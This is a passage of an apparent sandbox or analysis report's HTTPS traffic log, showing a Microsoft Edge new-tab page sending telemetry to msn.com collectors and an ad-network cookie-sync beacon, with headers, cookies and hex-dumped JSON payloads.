                                                                                                                                                                  2025-01-11 06:54:38 UTC16171OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 33 33 2e 37 31 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-11T06:54:33.712Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"locale"
                                                                                                                                                                  2025-01-11 06:54:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=a459b071be9a42e9b11452a980b7dc16&HASH=a459&LV=202501&V=4&LU=1736578478547; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=25594cd4bd704cebae3f167ebc6baaee; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 4834
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:37 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  56192.168.11.205325813.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:38 UTC1049OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578473946&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 9488
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:38 UTC9488OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 33 33 2e 39 34 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-11T06:54:33.945Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"locale"
                                                                                                                                                                  2025-01-11 06:54:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=bafabf50ce184de0b1100c0f9750e563&HASH=bafa&LV=202501&V=4&LU=1736578478558; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=866ee840275c4294acd780a945ddc178; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 4612
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:37 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  57192.168.11.206488968.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:38 UTC678OUTGET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
                                                                                                                                                                  Host: ib.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:39 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:38 GMT
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  AN-X-Request-Uuid: e04b385f-5427-4dbe-8cec-2303d4755e55
                                                                                                                                                                  Set-Cookie: anj=dTM7k!M4.FE:2jUF']wIg2E?dl7YT4!]tbPl1N!y*v_#NUa)ic_)mKcXt7O%Q9!(1W%V`LZ4JB[VFvM%SjN5@TMaOCjO)#m/X%W#.wL4W1Qw2-6^cbZ; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:38 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:38 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com
                                                                                                                                                                  2025-01-11 06:54:39 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 40 02 02 4c 01 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,@L;


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  58192.168.11.206245313.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:38 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578474725&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 20831
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:38 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 33 34 2e 37 32 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:34.724Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loca
                                                                                                                                                                  2025-01-11 06:54:38 UTC4447OUTData Raw: 22 63 74 31 73 22 3a 22 57 65 61 74 68 65 72 53 75 6d 6d 61 72 79 22 2c 22 68 65 69 67 68 74 22 3a 33 30 34 2c 22 72 6f 77 22 3a 31 2c 22 73 6c 6f 74 22 3a 30 2c 22 74 72 61 63 65 49 64 49 6e 64 65 78 22 3a 30 2c 22 77 69 64 74 68 22 3a 33 30 30 2c 22 73 69 67 6e 61 74 75 72 65 22 3a 22 77 78 6e 77 74 73 63 74 65 63 7c 31 39 22 7d 7d 2c 7b 22 6e 22 3a 22 68 6f 75 72 6c 79 46 6f 72 65 63 61 73 74 35 22 2c 22 79 22 3a 31 31 2c 22 76 22 3a 22 77 65 61 74 68 65 72 22 2c 22 63 22 3a 22 77 65 61 74 68 65 72 22 2c 22 63 74 22 3a 31 2c 22 69 22 3a 31 32 37 2c 22 70 22 3a 31 32 32 2c 22 6f 22 3a 35 2c 22 65 78 74 22 3a 7b 22 63 69 64 22 3a 22 32 22 2c 22 63 6f 22 3a 32 2c 22 63 6f 6c 22 3a 33 2c 22 63 74 31 73 22 3a 22 57 65 61 74 68 65 72 53 75 6d 6d 61 72 79 22
                                                                                                                                                                  Data Ascii: "ct1s":"WeatherSummary","height":304,"row":1,"slot":0,"traceIdIndex":0,"width":300,"signature":"wxnwtsctec|19"}},{"n":"hourlyForecast5","y":11,"v":"weather","c":"weather","ct":1,"i":127,"p":122,"o":5,"ext":{"cid":"2","co":2,"col":3,"ct1s":"WeatherSummary"
                                                                                                                                                                  2025-01-11 06:54:39 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=292fa731b98c4bba946855e1dba74d44&HASH=292f&LV=202501&V=4&LU=1736578478820; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=8e66d731f9564077ae8d70da8bd5d697; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 4095
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:38 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  59192.168.11.205334813.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:39 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578476341&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10308
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:39 UTC10308OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 33 36 2e 33 34 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:36.340Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loca
                                                                                                                                                                  2025-01-11 06:54:39 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=bb14293ef1f545d18edce1a984f01794&HASH=bb14&LV=202501&V=4&LU=1736578479212; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:39 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=3bddc805e440413392fbe38bc55fa364; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:39 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 2871
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:39 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  60192.168.11.206076813.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:40 UTC1049OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578479355&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 9313
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:40 UTC9313OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 34 3a 33 39 2e 33 35 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 36 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:54:39.354Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":6,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loca
                                                                                                                                                                  2025-01-11 06:54:40 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=3f773279fcd44b81ba920a0441ed5652&HASH=3f77&LV=202501&V=4&LU=1736578480436; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:54:40 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=983100d621234bcca89d87e5e296a7de; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:24:40 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1081
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:40 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  61192.168.11.2050713204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:40 UTC1023OUTGET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=dfa64b01-ec54-411d-97b5-76d005271c07&ii=1&c=2556969255498558843&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:40 UTC581INHTTP/1.1 204 No Content
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
